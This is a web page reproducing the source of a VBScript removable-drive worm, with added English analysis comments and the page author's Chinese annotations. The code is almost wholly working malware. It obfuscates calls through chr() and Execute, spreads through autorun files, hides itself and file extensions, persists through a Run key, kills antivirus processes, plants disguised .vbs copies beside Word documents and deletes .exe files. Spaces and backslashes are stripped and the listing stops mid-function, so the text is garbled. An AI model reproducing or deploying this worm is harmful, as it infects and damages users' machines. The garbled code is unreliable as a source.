vbs病毒源文件
摘要:remvbs.rhlDimfs,r,ss,w,reg,regpath,dvbsddd="Setfs="&chr(67)&"reate"&"O...

' Defensive reading aid: this listing is a removable-drive VBScript worm as published on the page.
' The page extraction dropped spaces and backslashes, so tokens such as "Dimfs" and paths such as
' "D:SystemVolumeInformationUSBDRIVE.dll" appear fused; the code is reproduced unchanged.
' The first line carries the marker "vbs.rhl"; ganrandiskroot searches an existing autorun.vbs
' for that string before replacing it.
remvbs.rhl

' Script-level variables shared by the functions below.
Dimfs,r,ss,w,reg,regpath,dvbs

' Obfuscation: each statement is assembled from chr() codes and short fragments and only then
' handed to Execute, so the object name never appears as one literal in the file.
' ddd decodes to Setfs=CreateObject("Scripting.FileSystemObject") (space-stripped as in this listing).
' Detection hint: chr()-built strings fed to Execute are a useful static heuristic for script scanners.
ddd="Setfs="&chr(67)&"reate"&"Obj"&chr(101)&"c"&chr(116)&chr(40)&chr(34)&"Scrip"&chr(116)&"ing.File"&chr(83)&"yste"&chr(109)&chr(79)&"bject"&chr(34)&chr(41)

Executeddd

' rrr decodes to setr=wscript.CreateObject("wscript.shell"); r is later used for r.run and,
' through the string held in a6, for registry writes.
rrr="setr="&chr(119)&"scri"&"pt."&chr(67)&"reate"&"Obj"&chr(101)&"c"&chr(116)&chr(40)&chr(34)&chr(119)&"scri"&"pt."&chr(115)&"he"&chr(108)&chr(108)&chr(34)&chr(41)

Executerrr

' sss decodes to fs.getfile(wscript.scriptfullname), i.e. an expression for the running script file.
' It is reused throughout as the prefix of the ".copy(...)" strings that are passed to Execute.
sss="fs."&chr(103)&"etfil"&chr(101)&chr(40)&chr(119)&"scri"&"pt."&"scri"&chr(112)&"tfull"&chr(110)&"ame"&chr(41)

' ttt binds dvbs to the running script's File object.
ttt="setdvbs="&sss

Executettt

' GetSpecialFolder(0) is the Windows folder, so this starts explorer.exe from there.
' NOTE(review): the trailing "." looks like the remnant of an argument lost in extraction - confirm against another copy.
r.run(fs.GetSpecialFolder(0)&"explorer.exe.")

' Entry point. The lines around "main()" / "submain()" appear out of order in this extraction;
' the visible call sequence is regtime, finddrive, countdrive(ss), regwrite, ganranfile(ss), xunhuan.
main()

' Errors are suppressed from here on, so failed file or registry operations produce no visible error.
OnErrorResumeNext

submain()

regtime()

finddrive()

countdrive(ss)

regwrite()

ganranfile(ss)

xunhuan()

endsub

' finddrive: branches on the running script's file name (dvbs.name), then fills the script-level
' string ss with candidate drive letters.
Functionfinddrive()

' Running as the installed copy named USBDRIVE.dll: apply the registry changes and enter the
' drive-watching loop in ganrandisk.
ifdvbs.name="USBDRIVE.dll"then

regwrite()

ganrandisk()

endif

' Running under any other name than autorun.vbs / USBDRIVE.dll (for example one of the decoy
' copies): apply the registry changes, then delete the running file.
ifdvbs.name<>"autorun.vbs"anddvbs.name<>"USBDRIVE.dll"then

regwrite()

dvbs.delete(true)

endif

ss=Trim("")

Setdc=fs.Drives

ForEachdIndc

' DriveType 1 is removable and 2 is fixed. In VBScript And binds tighter than Or, so the
' IsReady test applies only to the DriveType=2 case.
Ifd.DriveType=1ord.DriveType=2andd.IsReadyThen

ss=ss&d.DriveLetter

endif

Next

' The collected letters are lower-cased and reversed before use by countdrive and ganranfile.
ss=StrReverse(LCase(Trim(ss)))

endFunction

' countdrive: walks the drive-letter string ss one character at a time, binds the script-level
' variable w to each drive and calls ganrandiskroot for it.
Functioncountdrive(ss)

OnErrorResumeNext

dimx

Fori=1ToLen(ss)

x=Mid(ss,i,1)

' Fallback when Mid returns an empty string: restart from the first letter.
ifx=""then

x=Mid(ss,1,1)

i=1

endif

' w is read by ganrandiskroot rather than being passed as an argument.
Setw=fs.GetDrive(x)

ganrandiskroot()

Next

endFunction

' ganrandiskroot: for the drive currently held in w, installs the worm's files.
' Artifacts a responder can look for, all taken from the lines below (backslashes are missing
' from the listing's path strings):
'   - USBDRIVE.dll in the system folder (GetSpecialFolder(1)) or under D: System Volume Information
'   - autorun.vbs and autorun.inf in the drive root, marked read-only + hidden + system
'   - vbs.reg / doc.reg in the drive root or system folder, same attributes
'   - one visible decoy <name>.vbs in the drive root, name picked from the array s
Functionganrandiskroot()

dimc,s,f,vbc,ts,runreg

' Errors are suppressed, so each step below fails silently if the file system refuses it.
OnErrorResumeNext

' DriveType 2 is fixed, 1 is removable.
Ifw.DriveType=2orw.DriveType=1andw.IsReadyThen

' Step 1: make sure a copy named USBDRIVE.dll exists in the system folder.
Iffs.FileExists(fs.GetSpecialFolder(1)&"USBDRIVE.dll")Then

else

' sss is the "running script file" expression; the copy call is built as a string and Executed.
fff=sss&".copy("&chr(34)&fs.GetSpecialFolder(1)&"USBDRIVE.dll"&chr(34)&")"

Executefff

' If the system-folder copy did not succeed, fall back to a fixed location on D:.
Iffs.FileExists(fs.GetSpecialFolder(1)&"USBDRIVE.dll")Then

else

fff=sss&".copy("&chr(34)&"D:SystemVolumeInformationUSBDRIVE.dll"&chr(34)&")"

Executefff

iffs.FileExists("D:SystemVolumeInformationUSBDRIVE.dll")Then

' vbs.reg: a registry import file that sets the MUICache display string for wshext.dll,-4802
' to the Chinese for "text file".
Setts=fs.CreateTextFile(w.DriveLetter&":vbs.reg",true)

ts.WriteLine"WindowsRegistryEditorVersion5.00"

ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"

ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"文本文件"&chr(34)

ts.close

Setf=fs.GetFile(w.DriveLetter&":vbs.reg")

' Adding 7 sets read-only (1) + hidden (2) + system (4) when none of those bits was set before.
f.attributes=f.attributes+7

' doc.reg: same key, display string set to "Microsoft Word document" (in Chinese).
Setts=fs.CreateTextFile(w.DriveLetter&":doc.reg",true)

ts.WriteLine"WindowsRegistryEditorVersion5.00"

ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"

ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"MicrosoftWord文档"&chr(34)

ts.close

Setf=fs.GetFile(w.DriveLetter&":doc.reg")

f.attributes=f.attributes+7

endif

endif

endif

' Step 2: autorun.vbs in the drive root.
Iffs.FileExists(w.DriveLetter&":autorun.vbs")Then

' 1 = ForReading.
Setc=fs.opentextfile(w.DriveLetter&":autorun.vbs",1)

vbc=c.readall

' An existing autorun.vbs that contains the marker "vbs.rhl" is treated as this worm's own copy and kept.
IfInStr(vbc,"vbs.rhl")<>0Then

c.Close

Else

c.Close

' Any other autorun.vbs is deleted and replaced with a copy of the running script.
Setc=fs.GetFile(w.DriveLetter&":autorun.vbs")

c.delete(true)

fff=sss&".copy("&chr(34)&w.DriveLetter&":autorun.vbs"&chr(34)&")"

Executefff

' Decoy file names (Chinese). i ranges over 1..6, so element 0 is never selected.
s=Array("2007总结病毒","这是病毒","违纪病毒","检查病毒","黑名单病毒","没有发出的病毒","恋爱的病毒(病毒)")

Randomize

i=Int((6*Rnd)+1)

fff=sss&".copy("&chr(34)&w.DriveLetter&":"&s(i)&".vbs"&chr(34)&")"

Executefff

Setb=fs.GetFile(w.DriveLetter&":"&s(i)&".vbs")

' Attributes are cleared to 0, so the decoy stays visible while autorun.vbs is hidden below.
b.attributes=b.attributes-b.attributes

Setc=fs.GetFile(w.DriveLetter&":autorun.vbs")

c.attributes=c.attributes+7

' Step 2b: write vbs.reg / doc.reg unless one of them is already in the drive root.
Iffs.FileExists(w.DriveLetter&":vbs.reg")orfs.FileExists(w.DriveLetter&":doc.reg")Then

else

' For drive C the .reg files go to the system folder instead of the root.
ifw.DriveLetter="C"then

Setts=fs.CreateTextFile(fs.GetSpecialFolder(1)&"vbs.reg",true)

ts.WriteLine"WindowsRegistryEditorVersion5.00"

ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"

ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"文本文件"&chr(34)

ts.close

Setf=fs.GetFile(fs.GetSpecialFolder(1)&"vbs.reg")

f.attributes=f.attributes+7

' This call omits the overwrite argument that the other CreateTextFile calls pass.
Setts=fs.CreateTextFile(fs.GetSpecialFolder(1)&"doc.reg")

ts.WriteLine"WindowsRegistryEditorVersion5.00"

ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"

ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"MicrosoftWord文档"&chr(34)

ts.close

Setf=fs.GetFile(fs.GetSpecialFolder(1)&"doc.reg")

f.attributes=f.attributes+7

else

Setts=fs.CreateTextFile(w.DriveLetter&":vbs.reg",true)

ts.WriteLine"WindowsRegistryEditorVersion5.00"

ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"

ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"文本文件"&chr(34)

ts.close

Setf=fs.GetFile(w.DriveLetter&":vbs.reg")

f.attributes=f.attributes+7

Setts=fs.CreateTextFile(w.DriveLetter&":doc.reg",true)

ts.WriteLine"WindowsRegistryEditorVersion5.00"

ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"

ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"MicrosoftWord文档"&chr(34)

ts.close

Setf=fs.GetFile(w.DriveLetter&":doc.reg")

f.attributes=f.attributes+7

endif

endif

endif

else

' No autorun.vbs on the drive yet: same sequence as above without the read/delete step.
fff=sss&".copy("&chr(34)&w.DriveLetter&":autorun.vbs"&chr(34)&")"

Executefff

' Same decoy list in a different order; the fifth entry differs from the list used above.
s=Array("检查病毒","2007总结病毒","违纪病毒","这是病毒","黑名单","没有发出的病毒","恋爱的病毒(病毒)")

Randomize

i=Int((6*Rnd)+1)

fff=sss&".copy("&chr(34)&w.DriveLetter&":"&s(i)&".vbs"&chr(34)&")"

Executefff

Setb=fs.GetFile(w.DriveLetter&":"&s(i)&".vbs")

b.attributes=b.attributes-b.attributes

Setc=fs.GetFile(w.DriveLetter&":autorun.vbs")

c.attributes=c.attributes+7

Iffs.FileExists(w.DriveLetter&":vbs.reg")orfs.FileExists(w.DriveLetter&":doc.reg")Then

else

ifw.DriveLetter="C"then

Setts=fs.CreateTextFile(fs.GetSpecialFolder(1)&"vbs.reg",true)

ts.WriteLine"WindowsRegistryEditorVersion5.00"

ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"

ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"文本文件"&chr(34)

ts.close

Setf=fs.GetFile(fs.GetSpecialFolder(1)&"vbs.reg")

f.attributes=f.attributes+7

Setts=fs.CreateTextFile(fs.GetSpecialFolder(1)&"doc.reg")

ts.WriteLine"WindowsRegistryEditorVersion5.00"

ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"

ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"MicrosoftWord文档"&chr(34)

ts.close

Setf=fs.GetFile(fs.GetSpecialFolder(1)&"doc.reg")

f.attributes=f.attributes+7

else

Setts=fs.CreateTextFile(w.DriveLetter&":vbs.reg",true)

ts.WriteLine"WindowsRegistryEditorVersion5.00"

ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"

ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"文本文件"&chr(34)

ts.close

Setf=fs.GetFile(w.DriveLetter&":vbs.reg")

f.attributes=f.attributes+7

Setts=fs.CreateTextFile(w.DriveLetter&":doc.reg",true)

ts.WriteLine"WindowsRegistryEditorVersion5.00"

ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"

ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"MicrosoftWord文档"&chr(34)

ts.close

Setf=fs.GetFile(w.DriveLetter&":doc.reg")

f.attributes=f.attributes+7

endif

endif

endif

' Step 3: autorun.inf in the drive root, which points the drive's "open" verb at autorun.vbs.
Iffs.FileExists(w.DriveLetter&":autorun.inf")Then

Setc=fs.opentextfile(w.DriveLetter&":autorun.inf",1)

vbc=c.readall

' An autorun.inf that already references WScript.exe and autorun.vbs is left alone.
IfInStr(vbc,"WScript.exe.autorun.vbs")<>0Then

c.Close

Else

' Any other autorun.inf has its attributes cleared and its content overwritten.
Setf=fs.GetFile(w.DriveLetter&":autorun.inf")

f.attributes=f.attributes-f.attributes

' 2 = ForWriting, -2 = system default text format.
Setts=f.OpenAsTextStream(2,-2)

ts.WriteLine"[AutoRun]"

ts.WriteLine"open="

ts.WriteLine""

ts.WriteLine"shellopen=打开(&O)"

ts.WriteLine"shellopenCommand=WScript.exe.autorun.vbs"

ts.WriteLine"shellopenDefault=1"

ts.close

f.attributes=f.attributes+7

endif

else

Setts=fs.CreateTextFile(w.DriveLetter&":autorun.inf",true)

ts.WriteLine"[AutoRun]"

ts.WriteLine"open="

ts.WriteLine""

ts.WriteLine"shellopen=打开(&O)"

ts.WriteLine"shellopenCommand=WScript.exe.autorun.vbs"

ts.WriteLine"shellopenDefault=1"

ts.close

Setf=fs.GetFile(w.DriveLetter&":autorun.inf")

f.attributes=f.attributes+7

EndIf

endif

endFunction

' regwrite: applies the worm's registry changes. For triage, the values written below are:
'   - Explorer "Advanced" view settings ShowSuperHidden=0, HideFileExt=1, Hidden=0
'     (protected system files and known file extensions are no longer shown)
'   - NoDriveTypeAutoRun=0 under both HKLM and HKCU policies (no drive type excluded from AutoRun)
'   - a Run value named USBDRIVE.dll pointing at the installed copy (persistence at logon)
'   - the DLLFile class given a VBScript script engine and a Wscript.exe open command,
'     so the copy named USBDRIVE.dll is started as a script
'   - the VBSFile default icon replaced, so .vbs files no longer show the script icon
' Every write is built as a string ("R.RegWrite ...") and passed to Execute.
' The parenthesised text after some assignments is the page author's annotation fused onto the
' code line by the extraction; it is kept as found.
Functionregwrite()

OnErrorResumeNext

dims

' a1..a5 and a7 are registry paths split into fragments so the full key never appears as one literal.
a1="HKE"&"Y_CUR"&"RENT_US"&"ERSoft"&"wareMi"&"croso"&"ftWin"&"dowsCur"&"rentV"&"ersionExp"&"lorerAd"&"vanced"(a1=HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced

a2="HK"&"EY_CLAS"&"SES_RO"&"OTDLL"&"File"(a2=HKEY_CLASSES_ROOTDLLFile)

a3="HKEY"&"_LOCA"&"L_MACH"&"INESOFT"&"WAREMi"&"cros"&"oftWin"&"dowsCur"&"rentVer"&"sionpoli"&"ciesExpl"&"orerNoDr"&"iveTypeAutoRun"

(a3=HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerNoDriveTypeAutoRun)

a4="HKE"&"Y_CURR"&"ENT_USE"&"RSoftw"&"areMicr"&"osoftWi"&"ndowsCur"&"rentVersi"&"onPolici"&"esExplor"&"erNoDriveT"&"ypeAutoRun"

(a4=HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDriveTypeAutoRun)

a5="HK"&"EY_LO"&"CAL_MA"&"CHINESof"&"twareMi"&"croso"&"ftWind"&"owsCurre"&"ntVersi"&"onRu"&"nUSBDR"&"IVE.dll"

(a5=HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunUSBDRIVE.dll)

' a6 evaluates to the text "R.RegWrite": the method name on the wscript.shell object r.
a6="R.Re"&"gWri"&chr(116)&"e"(a6=R.RegWrichr(116)e)

a7="HKE"&"Y_CLAS"&"SES_ROO"&"TVBSF"&"ileDefau"&"ltIcon"

(a7=HKEY_CLASSES_ROOTVBSFileDefaultIcon)

' s is the drive that holds the running script.
sets=fs.GetDrive(fs.GetDriveName(dvbs.path))

' scandoc searches the Installer folder under the Windows folder for wordicon.exe and records
' the hit in the script-level variables reg and regpath.
scandoc(fs.GetSpecialFolder(0)&"Installer")

' Branch A: wordicon.exe was found, so the Word-flavoured disguise is used.
ifreg="wordicon.exe"then

ifs="C:"then

iffs.FileExists("D:SystemVolumeInformationUSBDRIVE.dll")Then

' regedit is started from the dllcache folder with /s, which imports the .reg file without a prompt.
r.run(fs.GetSpecialFolder(1)&"dllcacheregedit.exe/s"&Space(3)&"D:SystemVolumeInformationdoc.reg")

else

r.run(fs.GetSpecialFolder(1)&"dllcacheregedit.exe/s"&Space(3)&fs.GetSpecialFolder(1)&"doc.reg")

endif

else

iffs.FileExists("D:SystemVolumeInformationUSBDRIVE.dll")Then

r.run(fs.GetSpecialFolder(1)&"dllcacheregedit.exe/s"&Space(3)&"D:SystemVolumeInformationdoc.reg")

else

r.run(fs.GetSpecialFolder(1)&"dllcacheregedit.exe/s"&Space(3)&s.DriveLetter&":doc.reg")

endif

endif

' Sets the VBSFile default icon from the wordicon.exe path recorded by scandoc.
' The "®" character on this line is a page-encoding artifact, not part of the script.
ppp=a6&Space(2)&chr(34)&a7&chr(34)&","&chr(34)®path&",1"&chr(34)

Executeppp

else

' Branch B: no wordicon.exe, so vbs.reg is imported and a shell32.dll icon is used instead.
ifs="C:"then

iffs.FileExists("D:SystemVolumeInformationUSBDRIVE.dll")Then

r.run(fs.GetSpecialFolder(1)&"dllcacheregedit.exe/s"&Space(3)&"D:SystemVolumeInformationvbs.reg")

else

r.run(fs.GetSpecialFolder(1)&"dllcacheregedit.exe/s"&Space(3)&fs.GetSpecialFolder(1)&"vbs.reg")

endif

else

iffs.FileExists("D:SystemVolumeInformationUSBDRIVE.dll")Then

r.run(fs.GetSpecialFolder(1)&"dllcacheregedit.exe/s"&Space(3)&"D:SystemVolumeInformationvbs.reg")

else

r.run(fs.GetSpecialFolder(1)&"dllcacheregedit.exe/s"&Space(3)&s.DriveLetter&":vbs.reg")

endif

endif

ppp=a6&Space(2)&chr(34)&a7&chr(34)&","&chr(34)&fs.GetSpecialFolder(1)&"shell32.dll,1"&chr(34)

Executeppp

endif

' Explorer view settings: hide protected operating-system files.
ppp=a6&Space(2)&chr(34)&a1&"ShowSuperHidden"&chr(34)&","&"0,"&chr(34)&"REG_DWORD"&chr(34)

Executeppp

' Hide extensions of known file types, so a copy ending in .vbs shows without its extension.
ppp=a6&Space(2)&chr(34)&a1&"HideFileExt"&chr(34)&","&"1,"&chr(34)&"REG_DWORD"&chr(34)

Executeppp

' NOTE(review): presumably intended to stop hidden files being displayed - confirm the effect of 0 for this value.
ppp=a6&Space(2)&chr(34)&a1&"Hidden"&chr(34)&","&"0,"&chr(34)&"REG_DWORD"&chr(34)

Executeppp

' DLLFile class: registers VBScript as the script engine for .dll files.
ppp=a6&Space(2)&chr(34)&a2&"ScriptEngine"&chr(34)&","&chr(34)&"VBScript"&chr(34)

Executeppp

ppp=a6&Space(2)&chr(34)&a2&"ScriptHostEncode"&chr(34)&","&chr(34)&"{85131631-480C-11D2-B1F9-00C04F86C324}"&chr(34)

Executeppp

' DLLFile open command: Wscript.exe from the system folder with "%1" %*.
ppp=a6&Space(1)&chr(34)&a2&"ShellOpenCommand"&chr(34)&","&chr(34)&fs.GetSpecialFolder(1)&"Wscript.exe"&Space(1)&chr(34)&chr(34)&"%1"&chr(34)&chr(34)&Space(1)&"%*"&chr(34)

Executeppp

ppp=a6&Space(2)&chr(34)&a2&"ShellExPropertySheetHandlersWSHProps"&chr(34)&","&chr(34)&"{60254CA5-953B-11CF-8C96-00AA00B8708C}"&chr(34)

Executeppp

' NoDriveTypeAutoRun=0 for the machine and for the current user.
ppp=a6&Space(2)&chr(34)&a3&chr(34)&","&"0,"&chr(34)&"REG_DWORD"&chr(34)

Executeppp

ppp=a6&Space(2)&chr(34)&a4&chr(34)&","&"0,"&chr(34)&"REG_DWORD"&chr(34)

Executeppp

' Persistence: the Run value points at whichever USBDRIVE.dll copy exists.
iffs.FileExists("D:SystemVolumeInformationUSBDRIVE.dll")Then

ppp=a6&Space(2)&chr(34)&a5&chr(34)&","&chr(34)&"D:SystemVolumeInformation"&"USBDR"&"IVE.dll"&chr(34)

Executeppp

else

ppp=a6&Space(2)&chr(34)&a5&chr(34)&","&chr(34)&fs.GetSpecialFolder(1)&"USBDR"&"IVE.dll"&chr(34)

Executeppp

endif

' On the 27th of a month a message box is shown. Its text claims the disk has been formatted;
' no formatting call appears anywhere in this listing.
ifday(date())="27"then(27号报告错误)

msgbox"小样!你的杀毐软件该升级了,磁盘已被格式化"

EndIf

endFunction

' scandoc: recursive search of folder a for a file named wordicon.exe. On a hit it stores the
' file name in reg and the full path in regpath (both script-level) and returns.
' regwrite calls it on the Installer folder under the Windows folder and uses regpath as an icon source.
' The parenthesised Chinese text on several lines is the page author's annotation, kept as found.
Functionscandoc(a)(定义子函数)

' Errors (for example folders that cannot be read) are ignored.
OnErrorResumeNext(出错不报告)

dimfiles,file,subfolder,folder_

setfolder_=fs.getfolder(a)

setfiles=folder_.files

foreachfileinfiles(foreach。。。next对数组或集合中的每个元素重复执行一组语句)

iffile.name="wordicon.exe"then

reg=file.name

regpath=file.path

' Leaves this call only; callers further up the recursion continue with their next subfolder.
exitFunction

endif

next(foreach的next)

setsubfolders=folder_.subfolders(set是一个赋值语句)

foreachsubfolderinsubfolders

scandoc(subfolder)

next

endFunction(结束子程序的定义)

' regtime: removes the Windows Script Host timeout, then terminates a fixed list of
' antivirus processes (Rising, per the page author's annotation) through KillProcess.
' Detection hint: the Timeout write under the Windows Script Host Settings key and the
' termination of these process names are both observable in endpoint telemetry.
Functionregtime()(定义一个子程序添加注册表,结束瑞星)

' a6 evaluates to the text "R.RegWrite".
a6="R.Re"&"gWri"&chr(116)&"e"(a6=R.RegWrichr(116)echr(116)是值)

' a8 is the Windows Script Host Settings "Timeout" value under HKEY_CURRENT_USER, per the fused
' annotation; the string literal's end was lost in extraction.
a8="HKE"&"Y_CUR"&"RENT_US"&"ERSoft"&"wareMicr"&"osoftWin"&"dowsScr"&"iptingHo"&"stSettin"&"gsTimeou(a8=注册表HKEY_CURRENT_USERSoftwareMicrosoftWindowsScriptingHostSettingsTimeout)

' Writes Timeout = 0 as REG_DWORD.
ppp=a6&Space(2)&chr(34)&a8&chr(34)&","&"0,"&chr(34)&"REG_DWORD"&chr(34)

' NOTE: the page's annotation describes Execute as a regular-expression search. In this script
' Execute is used to run the string in ppp as a statement, here the registry write built above.
Executeppp(对指定的字符串执行正则表达式搜索)

dimNameorPID

kill=Array("RavMon.exe","RavTask.exe","RavStub.exe","RavMond.exe","RsAgent.exe")

' The loop covers indexes 0..4, i.e. all five names, although the annotation says four.
fori=0to4

KillProcess(kill(i))(结束4个瑞星程序)

next

endFunction(结束这个子程序)

' ganranfile: for each drive letter in aa, runs scan on the drive if it is ready, otherwise
' calls xunhuan. scan is the routine that drops copies next to .doc files.
' The parenthesised Chinese text is the page author's annotation, kept as found.
Functionganranfile(aa)(定义一个子程序)

OnErrorResumeNext(出错不报告)

dimx

Fori=1ToLen(aa)(len函数返回字符串内字符的数目,或是存储一变量所需的字节数)

x=Mid(aa,i,1)(mid函数从字符串中返回指定数目的字符。这里是一个个返回给X)

' Fallback when Mid returns an empty string: restart from the first letter.
ifx=""then

x=Mid(aa,1,1)

i=1

endif

' x is rebound from the letter to the Drive object.
Setx=fs.GetDrive(x)

ifx.IsReadythen

scan(x)

else

xunhuan()

endif

Next

endFunction(结束本子程序,作用不明)

' scan: recursive walk of folder x. For every file whose extension is "doc" it copies the
' running script to the same path with the last three characters replaced by "vbs".
' Combined with the HideFileExt and icon changes made in regwrite, such a copy is displayed
' next to the real document without a visible .vbs extension.
' Clean-up hint: look for .vbs files that share a base name with a .doc file in the same folder.
Functionscan(x)(定义子程序scan(a))

OnErrorResumeNext(出错不报告)

dimfiles,file,subfolder,folder_

setfolder_=fs.getfolder(x)

setfiles=folder_.files

foreachfileinfiles

s=file.path

ext=fs.GetExtensionName(file)

ext=lcase(ext)(lcase函数返回字符串的小写形式)

ifext="doc"then

' The page author's annotation (split over the next two lines by the extraction) guesses that
' the appended characters form a file name; they are the document's path with "doc" swapped for "vbs".
fff=sss&".copy("&chr(34)&mid(s,1,len(s)-3)&"vbs"&chr(34)&")"(fff是sss.copy加几个字符

怀疑这个几个字符组成一个文件名)

Executefff

endif

next

setsubfolders=folder_.subfolders

foreachsubfolderinsubfolders

scan(subfolder)

next

endFunction

' ganrandisk: resident loop. It re-enumerates fs.Drives roughly every 50 ms and, when the
' drive count grows (a drive was attached), runs countdrive and ganranfile on the new letters.
' Each pass also calls clearinfo on the known drives.
' Detection hint: a long-lived wscript.exe process that polls the drive list continuously.
Functionganrandisk()

OnErrorResumeNext

regwrite()

' w is declared locally here, separate from the script-level w used by countdrive.
dimdoc,d,s,coun,w,h,oo

Setdoc=fs.Drives

' h: letters of all drives that are ready at start-up.
foreachkindoc

ifk.IsReadythen

h=h&k.DriveLetter

endif

next

t1=len(Trim(h))

coun=doc.count

' Runs for as long as at least one drive is counted.
dowhilecoun>0

oo=h&w

clearinfo(oo)

wscript.sleep50

Setd=fs.Drives

' Drive count increased since the last pass.
ifd.count>counthen

foreachkind

ifk.IsReadythen

s=s&k.DriveLetter

endif

next

coun=d.count

t=StrReverse(LCase(Trim(s)))

' w takes as many leading characters of the reversed list as the ready-drive count changed by.
w=mid(t,1,abs(len(t)-t1))

countdrive(w)

ganranfile(w)

s=trim("")

t1=len(t)

endif

' Drive count decreased (a drive was removed): only the bookkeeping is refreshed.
ifd.count<counthen

foreachkind

ifk.IsReadythen

s=s&k.DriveLetter

endif

next

coun=d.count

t=StrReverse(LCase(Trim(s)))

s=trim("")

t1=len(t)

endif

loop

endFunction

' xunhuan: decides what the running copy does next, based on its own file name and the type of
' the drive it was started from.
Functionxunhuan()

OnErrorResumeNext

dimsfo

' sfo is the drive that holds the running script.
setsfo=fs.GetDrive(fs.GetDriveName(dvbs.path))

ifdvbs.name="autorun.vbs"ordvbs.name="USBDRIVE.dll"then

' DriveType 2 is a fixed disk: stay resident in the ganrandisk polling loop.
ifsfo.DriveType=2then

ganrandisk()

else

' Started from any other drive type: exit.
wscript.quit

endif

else

' Any other file name (for example a decoy copy): the running file deletes itself.
dvbs.delete(true)

endif

endFunction

' clearinfo: for each drive letter in oo, re-plants the worm's files via findinf and then
' deletes .exe files (through scanexe) from that drive's recycled and System Volume Information
' folders. Afterwards it does the same for three folders on the system drive.
' Impact note: scanexe deletes every .exe it finds, so legitimate executables in these folders are lost too.
Functionclearinfo(oo)

OnErrorResumeNext

dimdc,z

oo=LCase(Trim(oo))

Form=1ToLen(oo)

z=Mid(oo,m,1)

' z is rebound from the letter to the Drive object.
Setz=fs.GetDrive(z)

findinf(z)

v=Array(z.DriveLetter&":recycled",z.DriveLetter&":SystemVolumeInformation")

fori=0to1

scanexe(v(i))

next

next

' GetSpecialFolder(1) is the system folder, (2) the temporary folder, (0) the Windows folder.
vir=array(fs.GetSpecialFolder(1)&"recycled",fs.GetSpecialFolder(2),fs.GetSpecialFolder(0)&"system")

fori=0to2

scanexe(vir(i))

next

endFunction

' scanexe: if folder a exists, force-deletes every file in it whose extension is "exe" and
' recurses into all subfolders. Destructive: there is no filter on which executables are removed.
Functionscanexe(a)

' A 100 ms pause precedes each folder.
wscript.sleep100

OnErrorResumeNext

dimfiles,file,folder_

iffs.FolderExists(a)then

setfolder_=fs.getfolder(a)

setfiles=folder_.files

foreachfileinfiles

ext=fs.GetExtensionName(file)

ext=lcase(ext)

ifext="exe"then

Setf=fs.GetFile(file)

' delete(true) also removes read-only files.
f.delete(true)

endif

next

setsubfolders=folder_.subfolders

foreachsubfolderinsubfolders

scanexe(subfolder)

next

endif

endFunction

' findinf: re-creates any of the worm's files that are missing for drive z. It is called from
' clearinfo on every pass of the ganrandisk loop, so files deleted by hand reappear while the
' script is still running; terminate the wscript.exe process before cleaning the drive.
' Files checked: USBDRIVE.dll in the system folder, and autorun.vbs, autorun.inf, vbs.reg and
' doc.reg in the drive root.
Functionfindinf(z)

OnErrorResumeNext

' System-folder copy.
Iffs.FileExists(fs.GetSpecialFolder(1)&"USBDRIVE.dll")Then

else

fff=sss&".copy("&chr(34)&fs.GetSpecialFolder(1)&"USBDRIVE.dll"&chr(34)&")"

Executefff

Iffs.FileExists(fs.GetSpecialFolder(1)&"USBDRIVE.dll")Then

else

' If the copy still does not exist, a registry write is built that uses the D: path as its data.
ppp=a6&Space(2)&chr(34)&a5&chr(34)&","&chr(34)&"D:SystemVolumeInformation"&"USBDR"&"IVE.dll"&chr(34)

Executeppp

endif

endif

' autorun.vbs: only created when absent (no content check here, unlike ganrandiskroot).
Iffs.FileExists(z.DriveLetter&":autorun.vbs")Then

else

fff=sss&".copy("&chr(34)&z.DriveLetter&":autorun.vbs"&chr(34)&")"

Executefff

Setf=fs.GetFile(z.DriveLetter&":autorun.vbs")

' Adding 7 sets read-only + hidden + system on a file that had none of those bits.
f.attributes=f.attributes+7

endif

' autorun.inf: kept if it already references WScript.exe and autorun.vbs, otherwise overwritten.
Iffs.FileExists(z.DriveLetter&":autorun.inf")Then

' 1 = ForReading.
Setc=fs.opentextfile(z.DriveLetter&":autorun.inf",1)

vbc=c.readall

IfInStr(vbc,"WScript.exe.autorun.vbs")<>0Then

c.Close

Else

